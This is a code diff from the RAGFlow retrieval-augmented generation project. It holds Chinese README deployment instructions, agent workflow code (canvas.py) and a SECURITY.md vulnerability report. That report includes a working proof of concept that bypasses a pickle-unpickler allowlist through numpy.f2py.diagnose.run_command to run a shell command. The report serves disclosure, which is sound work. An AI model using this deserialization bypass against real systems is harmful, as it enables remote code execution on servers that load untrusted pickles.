 - 提供易用的 API，可以轻松集成到各类企业系统。
 ## 📌 新增功能
 - 2024-04-19 支持对话 API ([更多](./docs/conversation_api.md)).
 - 2024-04-16 添加嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 。
 - 2024-04-16 添加 [FastEmbed](https://github.com/qdrant/fastembed) 专为轻型和高速嵌入而设计。
 - 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
 - 2024-04-10 为‘Laws’版面分析增加了底层模型。
 - 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
 - 2024-04-07 支持中文界面。
 ## 🔎 系统架构
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -80,11 +141,14 @@
 - RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
-  > 如果你并没有在本机安装 Docker（Windows、Mac，或者 Linux）, 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
+- [gVisor](https://gvisor.dev/docs/user_guide/install/): 仅在你打算使用 RAGFlow 的代码执行器（沙箱）功能时才需要安装。
 > [!TIP]
 > 如果你并没有在本机安装 Docker（Windows、Mac，或者 Linux）, 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
 ### 🚀 启动服务器
-1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】：
+1. 确保 `vm.max_map_count` 不小于 262144：
   > 如需确认 `vm.max_map_count` 的大小：
   >
@ -113,13 +177,33 @@
 3. 进入 **docker** 文件夹，利用提前编译好的 Docker 镜像启动服务器：
 > [!CAUTION]
 > 请注意，目前官方提供的所有 Docker 镜像均基于 x86 架构构建，并不提供基于 ARM64 的 Docker 镜像。
 > 如果你的操作系统是 ARM64 架构，请参考[这篇文档](https://ragflow.io/docs/dev/build_docker_image)自行构建 Docker 镜像。
   > 运行以下命令会自动下载 RAGFlow slim Docker 镜像 `v0.20.0-slim`。请参考下表查看不同 Docker 发行版的描述。如需下载不同于 `v0.20.0-slim` 的 Docker 镜像，请在运行 `docker compose` 启动服务之前先更新 **docker/.env** 文件内的 `RAGFLOW_IMAGE` 变量。比如，你可以通过设置 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` 来下载 RAGFlow 镜像的 `v0.20.0` 完整发行版。
   ```bash
   $ cd ragflow/docker
-   $ chmod +x ./entrypoint.sh
+   # Use CPU for embedding and DeepDoc tasks:
-   $ docker compose -f docker-compose-CN.yml up -d
+   $ docker compose -f docker-compose.yml up -d
   # To use GPU to accelerate embedding and DeepDoc tasks:
   # docker compose -f docker-compose-gpu.yml up -d
   ```
-   > 核心镜像文件大约 15 GB，可能需要一定时间拉取。请耐心等待。
+   | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
   | ----------------- | --------------- | --------------------- | ------------------------ |
   | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
   | v0.20.0-slim      | &approx;2       | ❌                    | Stable release           |
   | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
   | nightly-slim      | &approx;2       | ❌                     | _Unstable_ nightly build |
   > [!TIP]
   > 如果你遇到 Docker 镜像拉不下来的问题，可以在 **docker/.env** 文件内根据变量 `RAGFLOW_IMAGE` 的注释提示选择华为云或者阿里云的相应镜像。
   >
   > - 华为云镜像名：`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
   > - 阿里云镜像名：`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
 4. 服务器启动成功后再次确认服务器状态：
@ -130,25 +214,22 @@
   _出现以下界面提示说明服务器启动成功：_
   ```bash
-       ____                 ______ __
+        ____   ___    ______ ______ __
-      / __ \ ____ _ ____ _ / ____// /____  _      __
+       / __ \ /   |  / ____// ____// /____  _      __
-     / /_/ // __ `// __ `// /_   / // __ \| | /| / /
+      / /_/ // /| | / / __ / /_   / // __ \| | /| / /
-    / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
+     / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
-   /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
+    /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
                 /____/
    * Running on all addresses (0.0.0.0)
    * Running on http://127.0.0.1:9380
    * Running on http://x.x.x.x:9380
    INFO:werkzeug:Press CTRL+C to quit
   ```
-   > 如果您跳过这一步系统确认步骤就登录 RAGFlow，你的浏览器有可能会提示 `network anomaly` 或 `网络异常`，因为 RAGFlow 可能并未完全启动成功。
+
   > 如果您在没有看到上面的提示信息出来之前，就尝试登录 RAGFlow，你的浏览器有可能会提示 `network anormal` 或 `网络异常`。
 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
   > 上面这个例子中，您只需输入 http://IP_OF_YOUR_MACHINE 即可：未改动过配置则无需输入端口（默认的 HTTP 服务端口 80）。
-6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory，并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
+6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件的 `user_default_llm` 栏配置 LLM factory，并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
-   > 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
+   > 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
   _好戏开始，接着奏乐接着舞！_
@ -157,50 +238,169 @@
 系统配置涉及以下三份文件：
 - [.env](./docker/.env)：存放一些基本的系统环境变量，比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
- [service_conf.yaml](./docker/service_conf.yaml)：配置各类后台服务。
+- [service_conf.yaml.template](./docker/service_conf.yaml.template)：配置各类后台服务。
- [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
+- [docker-compose.yml](./docker/docker-compose.yml): 系统依赖该文件完成启动。
-请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致！
+请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件中的配置保持一致！
-> [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
+如果不能访问镜像站点 hub.docker.com 或者模型站点 huggingface.co，请按照 [.env](./docker/.env) 注释修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
-如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
+> [./docker/README](./docker/README.md) 解释了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的环境变量设置和服务配置。
 如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose.yml](./docker/docker-compose.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
 > 所有系统配置都需要通过系统重启生效：
 >
 > ```bash
-> $ docker compose -f docker-compose-CN.yml up -d
+> $ docker compose -f docker-compose.yml up -d
 > ```
-## 🛠️ 源码编译、安装 Docker 镜像
+### 把文档引擎从 Elasticsearch 切换成为 Infinity
-如需从源码安装 Docker 镜像：
+RAGFlow 默认使用 Elasticsearch 存储文本和向量数据. 如果要切换为 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步骤进行:
 1. 停止所有容器运行:
   ```bash
   $ docker compose -f docker/docker-compose.yml down -v
   ```
   Note: `-v` 将会删除 docker 容器的 volumes，已有的数据会被清空。
 2. 设置 **docker/.env** 目录中的 `DOC_ENGINE` 为 `infinity`.
 3. 启动容器:
   ```bash
   $ docker compose -f docker-compose.yml up -d
   ```
 > [!WARNING]
 > Infinity 目前官方并未正式支持在 Linux/arm64 架构下的机器上运行.
 ## 🔧 源码编译 Docker 镜像（不含 embedding 模型）
 本 Docker 镜像大小约 2 GB 左右并且依赖外部的大模型和 embedding 服务。
 ```bash
-$ git clone https://github.com/infiniflow/ragflow.git
+git clone https://github.com/infiniflow/ragflow.git
-$ cd ragflow/
+cd ragflow/
-$ docker build -t infiniflow/ragflow:v0.3.2 .
+docker build --platform linux/amd64 --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 $ cd ragflow/docker
 $ chmod +x ./entrypoint.sh
 $ docker compose up -d
 ```
 ## 🔧 源码编译 Docker 镜像（包含 embedding 模型）
 本 Docker 大小约 9 GB 左右。由于已包含 embedding 模型，所以只需依赖外部的大模型服务即可。
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 以源代码启动服务
 1. 安装 uv。如已经安装，可跳过本步骤：
   ```bash
   pipx install uv pre-commit
   export UV_INDEX=https://mirrors.aliyun.com/pypi/simple
   ```
 2. 下载源代码并安装 Python 依赖：
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. 通过 Docker Compose 启动依赖的服务（MinIO, Elasticsearch, Redis, and MySQL）：
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   在 `/etc/hosts` 中添加以下代码，目的是将 **conf/service_conf.yaml** 文件中的所有 host 地址都解析为 `127.0.0.1`：
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. 如果无法访问 HuggingFace，可以把环境变量 `HF_ENDPOINT` 设成相应的镜像站点：
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. 如果你的操作系统没有 jemalloc，请按照如下方式安装：
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. 启动后端服务：
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. 安装前端依赖：
   ```bash
   cd web
   npm install
   ```
 8. 启动前端服务：
   ```bash
   npm run dev
   ```
   _以下界面说明系统已经成功启动：_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. 开发完成后停止 RAGFlow 前端和后端服务：
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 技术文档
- [FAQ](./docs/faq.md)
+- [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 路线图
-详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
+详见 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
 ## 🏄 开源社区
- [Discord](https://discord.gg/4XxujFgUN7)
+- [Discord](https://discord.gg/zd4qPW6t)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 贡献指南
-RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
+RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](https://ragflow.io/docs/dev/contributing) 。
 ## 🤝 商务合作
 - [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
 ## 👥 加入社区
@ -209,4 +409,3 @@ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们
 <p align="center">
  <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
 </p>
--- a/SECURITY.md
+++ b/SECURITY.md
@ -0,0 +1,74 @@
 # Security Policy
 ## Supported Versions
 Use this section to tell people about which versions of your project are
 currently being supported with security updates.
 | Version | Supported          |
 | ------- | ------------------ |
 | <=0.7.0   | :white_check_mark: |
 ## Reporting a Vulnerability
 ### Branch name
 main
 ### Actual behavior
 The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
 The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
 ### Steps to reproduce
 **ragflow_patch.py**
 ```py
 import builtins
 import io
 import pickle
 safe_module = {
    'numpy',
    'rag_flow'
 }
 class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))
 def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
 ```
 Then, **PoC.py**
 ```py
 import pickle
 from ragflow_patch import restricted_loads
 class Exploit:
     def __reduce__(self):
         import numpy.f2py.diagnose
         return numpy.f2py.diagnose.run_command, ('whoami', )
 Payload=pickle.dumps(Exploit())
 restricted_loads(Payload)
 ```
 **Result**
 ![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
 ### Additional information
 #### How to prevent?
 Strictly filter the module and name before calling with getattr function.
--- a/api/db/operatioins.py
+++ b/api/db/operatioins.py
@ -1,21 +1,18 @@
-#
+#
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
-#
+#
-#  Licensed under the Apache License, Version 2.0 (the "License");
+#  Licensed under the Apache License, Version 2.0 (the "License");
-#  you may not use this file except in compliance with the License.
+#  you may not use this file except in compliance with the License.
-#  You may obtain a copy of the License at
+#  You may obtain a copy of the License at
-#
+#
-#      http://www.apache.org/licenses/LICENSE-2.0
+#      http://www.apache.org/licenses/LICENSE-2.0
-#
+#
-#  Unless required by applicable law or agreed to in writing, software
+#  Unless required by applicable law or agreed to in writing, software
-#  distributed under the License is distributed on an "AS IS" BASIS,
+#  distributed under the License is distributed on an "AS IS" BASIS,
-#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#  See the License for the specific language governing permissions and
+#  See the License for the specific language governing permissions and
-#  limitations under the License.
+#  limitations under the License.
-#
+#
-
+
-import operator
+from beartype.claw import beartype_this_package
-import time
+beartype_this_package()
 import typing
 from api.utils.log_utils import sql_logger
 import peewee
--- a/agent/canvas.py
+++ b/agent/canvas.py
@ -0,0 +1,538 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import base64
 import json
 import logging
 import time
 from concurrent.futures import ThreadPoolExecutor
 from copy import deepcopy
 from functools import partial
 from typing import Any, Union, Tuple
 from agent.component import component_class
 from agent.component.base import ComponentBase
 from api.db.services.file_service import FileService
 from api.utils import get_uuid, hash_str2int
 from rag.prompts.prompts import chunks_format
 from rag.utils.redis_conn import REDIS_CONN
 class Canvas:
    """
    dsl = {
        "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {},
                },
                "downstream": ["answer_0"],
                "upstream": [],
            },
            "retrieval_0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {}
                },
                "downstream": ["generate_0"],
                "upstream": ["answer_0"],
            },
            "generate_0": {
                "obj": {
                    "component_name": "Generate",
                    "params": {}
                },
                "downstream": ["answer_0"],
                "upstream": ["retrieval_0"],
            }
        },
        "history": [],
        "path": ["begin"],
        "retrieval": {"chunks": [], "doc_aggs": []},
        "globals": {
            "sys.query": "",
            "sys.user_id": tenant_id,
            "sys.conversation_turns": 0,
            "sys.files": []
        }
    }
    """
    def __init__(self, dsl: str, tenant_id=None, task_id=None):
        self.path = []
        self.history = []
        self.components = {}
        self.error = ""
        self.globals = {
            "sys.query": "",
            "sys.user_id": tenant_id,
            "sys.conversation_turns": 0,
            "sys.files": []
        }
        self.dsl = json.loads(dsl) if dsl else {
            "components": {
                "begin": {
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "prologue": "Hi there!"
                        }
                    },
                    "downstream": [],
                    "upstream": [],
                    "parent_id": ""
                }
            },
            "history": [],
            "path": [],
            "retrieval": [],
            "globals": {
                "sys.query": "",
                "sys.user_id": "",
                "sys.conversation_turns": 0,
                "sys.files": []
            }
        }
        self._tenant_id = tenant_id
        self.task_id = task_id if task_id else get_uuid()
        self.load()
    def load(self):
        self.components = self.dsl["components"]
        cpn_nms = set([])
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])
        assert "Begin" in cpn_nms, "There have to be an 'Begin' component."
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])
            param = component_class(cpn["obj"]["component_name"] + "Param")()
            param.update(cpn["obj"]["params"])
            try:
                param.check()
            except Exception as e:
                raise ValueError(self.get_component_name(k) + f": {e}")
            cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
        self.path = self.dsl["path"]
        self.history = self.dsl["history"]
        self.globals = self.dsl["globals"]
        self.retrieval = self.dsl["retrieval"]
        self.memory = self.dsl.get("memory", [])
    def __str__(self):
        self.dsl["path"] = self.path
        self.dsl["history"] = self.history
        self.dsl["globals"] = self.globals
        self.dsl["task_id"] = self.task_id
        self.dsl["retrieval"] = self.retrieval
        self.dsl["memory"] = self.memory
        dsl = {
            "components": {}
        }
        for k in self.dsl.keys():
            if k in ["components"]:
                continue
            dsl[k] = deepcopy(self.dsl[k])
        for k, cpn in self.components.items():
            if k not in dsl["components"]:
                dsl["components"][k] = {}
            for c in cpn.keys():
                if c == "obj":
                    dsl["components"][k][c] = json.loads(str(cpn["obj"]))
                    continue
                dsl["components"][k][c] = deepcopy(cpn[c])
        return json.dumps(dsl, ensure_ascii=False)
    def reset(self, mem=False):
        self.path = []
        if not mem:
            self.history = []
            self.retrieval = []
            self.memory = []
        for k, cpn in self.components.items():
            self.components[k]["obj"].reset()
        for k in self.globals.keys():
            if isinstance(self.globals[k], str):
                self.globals[k] = ""
            elif isinstance(self.globals[k], int):
                self.globals[k] = 0
            elif isinstance(self.globals[k], float):
                self.globals[k] = 0
            elif isinstance(self.globals[k], list):
                self.globals[k] = []
            elif isinstance(self.globals[k], dict):
                self.globals[k] = {}
            else:
                self.globals[k] = None
        try:
            REDIS_CONN.delete(f"{self.task_id}-logs")
        except Exception as e:
            logging.exception(e)
    def get_component_name(self, cid):
        for n in self.dsl.get("graph", {}).get("nodes", []):
            if cid == n["id"]:
                return n["data"]["name"]
        return ""
    def run(self, **kwargs):
        st = time.perf_counter()
        self.message_id = get_uuid()
        created_at = int(time.time())
        self.add_user_input(kwargs.get("query"))
        for k in kwargs.keys():
            if k in ["query", "user_id", "files"] and kwargs[k]:
                if k == "files":
                    self.globals[f"sys.{k}"] = self.get_files(kwargs[k])
                else:
                    self.globals[f"sys.{k}"] = kwargs[k]
        if not self.globals["sys.conversation_turns"] :
            self.globals["sys.conversation_turns"] = 0
        self.globals["sys.conversation_turns"] += 1
        def decorate(event, dt):
            nonlocal created_at
            return {
                "event": event,
                #"conversation_id": "f3cc152b-24b0-4258-a1a1-7d5e9fc8a115",
                "message_id": self.message_id,
                "created_at": created_at,
                "task_id": self.task_id,
                "data": dt
            }
        if not self.path or self.path[-1].lower().find("userfillup") < 0:
            self.path.append("begin")
            self.retrieval.append({"chunks": [], "doc_aggs": []})
        yield decorate("workflow_started", {"inputs": kwargs.get("inputs")})
        self.retrieval.append({"chunks": {}, "doc_aggs": {}})
        def _run_batch(f, t):
            with ThreadPoolExecutor(max_workers=5) as executor:
                thr = []
                for i in range(f, t):
                    cpn = self.get_component_obj(self.path[i])
                    if cpn.component_name.lower() in ["begin", "userfillup"]:
                        thr.append(executor.submit(cpn.invoke, inputs=kwargs.get("inputs", {})))
                    else:
                        thr.append(executor.submit(cpn.invoke, **cpn.get_input()))
                for t in thr:
                    t.result()
        def _node_finished(cpn_obj):
            return decorate("node_finished",{
                           "inputs": cpn_obj.get_input_values(),
                           "outputs": cpn_obj.output(),
                           "component_id": cpn_obj._id,
                           "component_name": self.get_component_name(cpn_obj._id),
                           "component_type": self.get_component_type(cpn_obj._id),
                           "error": cpn_obj.error(),
                           "elapsed_time": time.perf_counter() - cpn_obj.output("_created_time"),
                           "created_at": cpn_obj.output("_created_time"),
                       })
        self.error = ""
        idx = len(self.path) - 1
        partials = []
        while idx < len(self.path):
            to = len(self.path)
            for i in range(idx, to):
                yield decorate("node_started", {
                    "inputs": None, "created_at": int(time.time()),
                    "component_id": self.path[i],
                    "component_name": self.get_component_name(self.path[i]),
                    "component_type": self.get_component_type(self.path[i]),
                    "thoughts": self.get_component_thoughts(self.path[i])
                })
            _run_batch(idx, to)
            # post processing of components invocation
            for i in range(idx, to):
                cpn = self.get_component(self.path[i])
                cpn_obj = self.get_component_obj(self.path[i])
                if cpn_obj.component_name.lower() == "message":
                    if isinstance(cpn_obj.output("content"), partial):
                        _m = ""
                        for m in cpn_obj.output("content")():
                            if not m:
                                continue
                            if m == "<think>":
                                yield decorate("message", {"content": "", "start_to_think": True})
                            elif m == "</think>":
                                yield decorate("message", {"content": "", "end_to_think": True})
                            else:
                                yield decorate("message", {"content": m})
                                _m += m
                        cpn_obj.set_output("content", _m)
                    else:
                        yield decorate("message", {"content": cpn_obj.output("content")})
                    yield decorate("message_end", {"reference": self.get_reference()})
                    while partials:
                        _cpn_obj = self.get_component_obj(partials[0])
                        if isinstance(_cpn_obj.output("content"), partial):
                            break
                        yield _node_finished(_cpn_obj)
                        partials.pop(0)
                other_branch = False
                if cpn_obj.error():
                    ex = cpn_obj.exception_handler()
                    if ex and ex["goto"]:
                        self.path.extend(ex["goto"])
                        other_branch = True
                    elif ex and ex["default_value"]:
                        yield decorate("message", {"content": ex["default_value"]})
                        yield decorate("message_end", {})
                    else:
                        self.error = cpn_obj.error()
                if cpn_obj.component_name.lower() != "iteration":
                    if isinstance(cpn_obj.output("content"), partial):
                        if self.error:
                            cpn_obj.set_output("content", None)
                            yield _node_finished(cpn_obj)
                        else:
                            partials.append(self.path[i])
                    else:
                        yield _node_finished(cpn_obj)
                def _append_path(cpn_id):
                    nonlocal other_branch
                    if other_branch:
                        return
                    if self.path[-1] == cpn_id:
                        return
                    self.path.append(cpn_id)
                def _extend_path(cpn_ids):
                    nonlocal other_branch
                    if other_branch:
                        return
                    for cpn_id in cpn_ids:
                        _append_path(cpn_id)
                if cpn_obj.component_name.lower() == "iterationitem" and cpn_obj.end():
                    iter = cpn_obj.get_parent()
                    yield _node_finished(iter)
                    _extend_path(self.get_component(cpn["parent_id"])["downstream"])
                elif cpn_obj.component_name.lower() in ["categorize", "switch"]:
                    _extend_path(cpn_obj.output("_next"))
                elif cpn_obj.component_name.lower() == "iteration":
                    _append_path(cpn_obj.get_start())
                elif not cpn["downstream"] and cpn_obj.get_parent():
                    _append_path(cpn_obj.get_parent().get_start())
                else:
                    _extend_path(cpn["downstream"])
            if self.error:
                logging.error(f"Runtime Error: {self.error}")
                break
            idx = to
            if any([self.get_component_obj(c).component_name.lower() == "userfillup" for c in self.path[idx:]]):
                path = [c for c in self.path[idx:] if self.get_component(c)["obj"].component_name.lower() == "userfillup"]
                path.extend([c for c in self.path[idx:] if self.get_component(c)["obj"].component_name.lower() != "userfillup"])
                another_inputs = {}
                tips = ""
                for c in path:
                    o = self.get_component_obj(c)
                    if o.component_name.lower() == "userfillup":
                        another_inputs.update(o.get_input_elements())
                        if o.get_param("enable_tips"):
                            tips = o.get_param("tips")
                self.path = path
                yield decorate("user_inputs", {"inputs": another_inputs, "tips": tips})
                return
        self.path = self.path[:idx]
        if not self.error:
            yield decorate("workflow_finished",
                       {
                           "inputs": kwargs.get("inputs"),
                           "outputs": self.get_component_obj(self.path[-1]).output(),
                           "elapsed_time": time.perf_counter() - st,
                           "created_at": st,
                       })
            self.history.append(("assistant", self.get_component_obj(self.path[-1]).output()))
    def get_component(self, cpn_id) -> Union[None, dict[str, Any]]:
        return self.components.get(cpn_id)
    def get_component_obj(self, cpn_id) -> ComponentBase:
        return self.components.get(cpn_id)["obj"]
    def get_component_type(self, cpn_id) -> str:
        return self.components.get(cpn_id)["obj"].component_name
    def get_component_input_form(self, cpn_id) -> dict:
        return self.components.get(cpn_id)["obj"].get_input_form()
    def is_reff(self, exp: str) -> bool:
        exp = exp.strip("{").strip("}")
        if exp.find("@") < 0:
            return exp in self.globals
        arr = exp.split("@")
        if len(arr) != 2:
            return False
        if self.get_component(arr[0]) is None:
            return False
        return True
    def get_variable_value(self, exp: str) -> Any:
        exp = exp.strip("{").strip("}").strip(" ").strip("{").strip("}")
        if exp.find("@") < 0:
            return self.globals[exp]
        cpn_id, var_nm = exp.split("@")
        cpn = self.get_component(cpn_id)
        if not cpn:
            raise Exception(f"Can't find variable: '{cpn_id}@{var_nm}'")
        return cpn["obj"].output(var_nm)
    def get_tenant_id(self):
        return self._tenant_id
    def get_history(self, window_size):
        convs = []
        if window_size <= 0:
            return convs
        for role, obj in self.history[window_size * -1:]:
            if isinstance(obj, dict):
                convs.append({"role": role, "content": obj.get("content", "")})
            else:
                convs.append({"role": role, "content": str(obj)})
        return convs
    def add_user_input(self, question):
        self.history.append(("user", question))
    def _find_loop(self, max_loops=6):
        path = self.path[-1][::-1]
        if len(path) < 2:
            return False
        for i in range(len(path)):
            if path[i].lower().find("answer") == 0 or path[i].lower().find("iterationitem") == 0:
                path = path[:i]
                break
        if len(path) < 2:
            return False
        for loc in range(2, len(path) // 2):
            pat = ",".join(path[0:loc])
            path_str = ",".join(path)
            if len(pat) >= len(path_str):
                return False
            loop = max_loops
            while path_str.find(pat) == 0 and loop >= 0:
                loop -= 1
                if len(pat)+1 >= len(path_str):
                    return False
                path_str = path_str[len(pat)+1:]
            if loop < 0:
                pat = " => ".join([p.split(":")[0] for p in path[0:loc]])
                return pat + " => " + pat
        return False
    def get_prologue(self):
        return self.components["begin"]["obj"]._param.prologue
    def set_global_param(self, **kwargs):
        self.globals.update(kwargs)
    def get_preset_param(self):
        return self.components["begin"]["obj"]._param.inputs
    def get_component_input_elements(self, cpnnm):
        return self.components[cpnnm]["obj"].get_input_elements()
    def get_files(self, files: Union[None, list[dict]]) -> list[str]:
        if not files:
            return  []
        def image_to_base64(file):
            return "data:{};base64,{}".format(file["mime_type"],
                                        base64.b64encode(FileService.get_blob(file["created_by"], file["id"])).decode("utf-8"))
        exe = ThreadPoolExecutor(max_workers=5)
        threads = []
        for file in files:
            if file["mime_type"].find("image") >=0:
                threads.append(exe.submit(image_to_base64, file))
                continue
            threads.append(exe.submit(FileService.parse, file["name"], FileService.get_blob(file["created_by"], file["id"]), True, file["created_by"]))
        return [th.result() for th in threads]
    def tool_use_callback(self, agent_id: str, func_name: str, params: dict, result: Any):
        agent_ids = agent_id.split("-->")
        agent_name = self.get_component_name(agent_ids[0])
        path = agent_name if len(agent_ids) < 2 else agent_name+"-->"+"-->".join(agent_ids[1:])
        try:
            bin = REDIS_CONN.get(f"{self.task_id}-{self.message_id}-logs")
            if bin:
                obj = json.loads(bin.encode("utf-8"))
                if obj[-1]["component_id"] == agent_ids[0]:
                    obj[-1]["trace"].append({"path": path, "tool_name": func_name, "arguments": params, "result": result})
                else:
                    obj.append({
                    "component_id": agent_ids[0],
                    "trace": [{"path": path, "tool_name": func_name, "arguments": params, "result": result}]
                })
            else:
                obj = [{
                    "component_id": agent_ids[0],
                    "trace": [{"path": path, "tool_name": func_name, "arguments": params, "result": result}]
                }]
            REDIS_CONN.set_obj(f"{self.task_id}-{self.message_id}-logs", obj, 60*10)
        except Exception as e:
            logging.exception(e)
    def add_refernce(self, chunks: list[object], doc_infos: list[object]):
        if not self.retrieval:
            self.retrieval = [{"chunks": {}, "doc_aggs": {}}]
        r = self.retrieval[-1]
        for ck in chunks_format({"chunks": chunks}):
            cid = hash_str2int(ck["id"], 100)
            if cid not in r:
                r["chunks"][cid] = ck
        for doc in doc_infos:
            if doc["doc_name"] not in r:
                r["doc_aggs"][doc["doc_name"]] = doc
    def get_reference(self):
        if not self.retrieval:
            return {"chunks": {}, "doc_aggs": {}}
        return self.retrieval[-1]
    def add_memory(self, user:str, assist:str, summ: str):
        self.memory.append((user, assist, summ))
    def get_memory(self) -> list[Tuple]:
        return self.memory
    def get_component_thoughts(self, cpn_id) -> str:
        return self.components.get(cpn_id)["obj"].thoughts()
--- a/agent/component/init.py
+++ b/agent/component/init.py
@ -0,0 +1,57 @@
